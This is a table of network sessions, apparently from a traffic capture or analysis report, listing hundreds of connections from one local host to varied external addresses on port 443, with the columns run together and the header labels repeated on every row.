                                        14164192.168.2.135373265.41.31.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14165192.168.2.1336358209.23.47.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14166192.168.2.1355872104.68.25.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14167192.168.2.134397012.26.61.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14168192.168.2.133407262.41.59.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14169192.168.2.1340652173.150.78.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14170192.168.2.1355032134.103.233.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14171192.168.2.134200817.164.178.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14172192.168.2.1354944148.64.59.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14173192.168.2.1352882184.75.36.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14174192.168.2.1357720126.159.0.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14175192.168.2.1349134200.179.18.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14176192.168.2.135160657.191.128.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14177192.168.2.134994839.131.102.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14178192.168.2.133332292.210.139.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14179192.168.2.1349480209.108.50.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14180192.168.2.1346364186.167.144.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14181192.168.2.1351004191.162.64.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14182192.168.2.1350996216.209.3.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14183192.168.2.133360457.191.211.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14184192.168.2.135469271.55.152.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14185192.168.2.1341660202.50.53.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14186192.168.2.133904069.21.124.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14187192.168.2.133821236.44.134.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14188192.168.2.134858875.245.189.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14189192.168.2.136002071.159.37.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14190192.168.2.13468229.81.220.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14191192.168.2.1346560144.248.187.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14192192.168.2.133283290.53.178.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14193192.168.2.1355052195.22.254.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14194192.168.2.1334912189.238.143.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14195192.168.2.1339322137.52.171.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14196192.168.2.1340822114.77.87.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14197192.168.2.135127076.85.230.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14198192.168.2.1353466124.210.49.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14199192.168.2.133902424.91.124.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14200192.168.2.135935698.253.187.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14201192.168.2.1339652183.0.73.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14202192.168.2.133590890.30.109.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14203192.168.2.1344924153.12.114.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14204192.168.2.1355162172.74.12.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14205192.168.2.1338982194.136.110.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14206192.168.2.135982288.79.163.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14207192.168.2.1342388113.63.119.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14208192.168.2.1339700203.87.181.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14209192.168.2.1344344138.73.1.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14210192.168.2.1334158118.144.32.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14211192.168.2.1341692203.122.109.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14212192.168.2.1355980181.18.210.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14213192.168.2.135101678.123.197.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14214192.168.2.1360138181.206.22.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14215192.168.2.1353944191.163.8.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14216192.168.2.135706820.238.52.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14217192.168.2.135332698.92.129.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14218192.168.2.1343964143.28.24.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14219192.168.2.1344876200.81.46.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14220192.168.2.135499866.89.171.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14221192.168.2.1359258208.95.93.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14222192.168.2.133611242.123.250.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14223192.168.2.135722219.79.199.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14224192.168.2.133323037.93.7.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14225192.168.2.1356958138.202.131.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14226192.168.2.1332916112.255.42.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14227192.168.2.135612625.107.113.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14228192.168.2.133714438.27.210.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14229192.168.2.13391022.54.222.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14230192.168.2.1349294100.22.254.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14231192.168.2.1343802213.169.24.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14232192.168.2.1351086136.103.18.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14233192.168.2.1338416219.139.202.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14234192.168.2.1346114104.20.122.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14235192.168.2.1342318137.87.176.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14236192.168.2.1338898114.253.199.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14237192.168.2.1339412208.21.66.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14238192.168.2.1352898190.81.108.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14239192.168.2.1342812182.229.117.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14240192.168.2.1337008191.129.190.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14241192.168.2.1351986189.178.143.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14242192.168.2.1340828196.79.81.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14243192.168.2.133976280.209.141.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14244192.168.2.133803070.190.166.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14245192.168.2.1348252161.70.13.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14246192.168.2.1353402164.38.118.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14247192.168.2.1355690211.202.24.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14248192.168.2.133615072.104.49.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14249192.168.2.1338976140.205.240.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14250192.168.2.1354408137.73.233.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14251192.168.2.1335390102.2.152.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14252192.168.2.135602458.200.145.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14253192.168.2.1340736212.244.233.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14254192.168.2.135881243.43.66.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14255192.168.2.134021492.212.91.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14256192.168.2.135110641.190.75.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14257192.168.2.1333122173.12.156.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14258192.168.2.136031624.49.146.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14259192.168.2.1358644165.248.25.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14260192.168.2.135178244.134.52.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14261192.168.2.135900477.38.85.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14262192.168.2.1338216184.169.43.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14263192.168.2.1340926151.8.186.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14264192.168.2.1339258113.130.154.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14265192.168.2.1337392192.127.44.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14266192.168.2.1338480101.127.1.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14267192.168.2.133560280.246.70.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14268192.168.2.1360668109.17.217.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14269192.168.2.1339738190.105.125.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14270192.168.2.1358396180.91.173.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14271192.168.2.1340370134.207.2.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14272192.168.2.1334562130.239.127.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14273192.168.2.1350422150.33.55.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14274192.168.2.1335310116.10.52.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14275192.168.2.134334893.151.245.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14276192.168.2.1337054223.156.154.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14277192.168.2.13533248.78.33.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14278192.168.2.133754419.226.179.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14279192.168.2.13595042.162.177.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14280192.168.2.1339672200.177.233.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14281192.168.2.1348730105.155.153.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14282192.168.2.13514945.167.190.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14283192.168.2.1342966126.144.202.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14284192.168.2.134738617.1.160.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14285192.168.2.135155438.74.160.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14286192.168.2.134174696.107.37.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14287192.168.2.1355740184.251.158.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14288192.168.2.135809488.190.212.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14289192.168.2.1344166187.213.228.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14290192.168.2.134073689.202.148.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14291192.168.2.1338760218.240.253.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14292192.168.2.1337944208.139.94.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14293192.168.2.1352590156.102.137.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14294192.168.2.133791452.88.52.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14295192.168.2.135880447.128.35.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14296192.168.2.1345454162.79.141.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14297192.168.2.1339996115.152.52.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14298192.168.2.133884474.57.182.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14299192.168.2.1335882217.131.70.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14300192.168.2.133951619.47.142.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14301192.168.2.136026263.128.16.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14302192.168.2.1357896144.15.22.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14303192.168.2.1351718220.79.235.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14304192.168.2.1360296103.18.44.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14305192.168.2.1342588189.172.113.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14306192.168.2.1358878113.141.131.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14307192.168.2.133562434.91.33.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14308192.168.2.1353052152.181.23.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14309192.168.2.135418625.201.36.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14310192.168.2.13409524.100.182.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14311192.168.2.1335270207.22.238.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14312192.168.2.134926458.45.34.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14313192.168.2.1357678182.210.145.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14314192.168.2.1343774186.46.104.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14315192.168.2.1339964223.150.235.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14316192.168.2.135324273.225.127.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14317192.168.2.1349572148.198.12.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14318192.168.2.134653240.179.208.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14319192.168.2.133671290.1.65.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14320192.168.2.133282858.13.81.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14321192.168.2.1352654152.7.11.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14322192.168.2.135194664.90.42.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14323192.168.2.1352522103.89.93.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14324192.168.2.1354068101.157.225.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14325192.168.2.1346656129.158.111.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14326192.168.2.134354837.29.87.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14327192.168.2.1343202101.246.255.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14328192.168.2.1359296116.204.56.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14329192.168.2.1351220152.90.98.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14330192.168.2.134352624.232.161.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14331192.168.2.134269613.1.200.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14332192.168.2.1349160142.83.190.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14333192.168.2.1340964182.151.241.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14334192.168.2.135332447.73.195.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14335192.168.2.133749850.7.127.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14336192.168.2.1356814202.114.59.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14337192.168.2.1349696216.51.57.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14338192.168.2.1338886167.23.139.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14339192.168.2.1343918106.202.248.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14340192.168.2.1350978138.79.118.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14341192.168.2.13366805.133.5.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14342192.168.2.13423801.106.211.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14343192.168.2.1354486150.38.13.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14344192.168.2.1358976126.38.201.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14345192.168.2.1340426201.148.103.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14346192.168.2.133706249.68.239.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14347192.168.2.135481278.41.18.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14348192.168.2.1334734179.252.35.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14349192.168.2.135928892.97.192.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14350192.168.2.1333738187.223.49.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14351192.168.2.135016412.115.236.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14352192.168.2.1356016216.95.144.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14353192.168.2.1352878156.64.112.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14354192.168.2.1351326220.191.254.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14355192.168.2.135546461.112.65.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14356192.168.2.1333354185.162.141.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14357192.168.2.134347845.20.78.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14358192.168.2.135735832.31.247.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14359192.168.2.133361631.15.209.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14360192.168.2.134323060.158.26.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14361192.168.2.1337934152.234.42.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14362192.168.2.134358287.248.230.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14363192.168.2.1342238205.245.186.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14364192.168.2.1348662188.68.46.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14365192.168.2.1348368180.5.151.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14366192.168.2.1338900158.202.127.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14367192.168.2.13599108.111.86.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14368192.168.2.1352146195.78.173.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14369192.168.2.1358886195.169.144.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14370192.168.2.1356594160.131.226.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14371192.168.2.134558236.215.20.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14372192.168.2.133972039.193.24.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14373192.168.2.1339686126.218.141.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14374192.168.2.134611460.136.14.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14375192.168.2.1351508128.35.111.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14376192.168.2.134898477.185.88.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14377192.168.2.135690261.183.35.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14378192.168.2.1348428167.112.209.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14379192.168.2.134620663.45.222.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14380192.168.2.134738235.118.34.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14381192.168.2.1355622118.107.50.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14382192.168.2.133863617.159.113.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14383192.168.2.1341582159.218.193.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14384192.168.2.134350070.182.65.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14385192.168.2.134771867.68.20.172443
                                        TimestampBytes transferredDirectionData


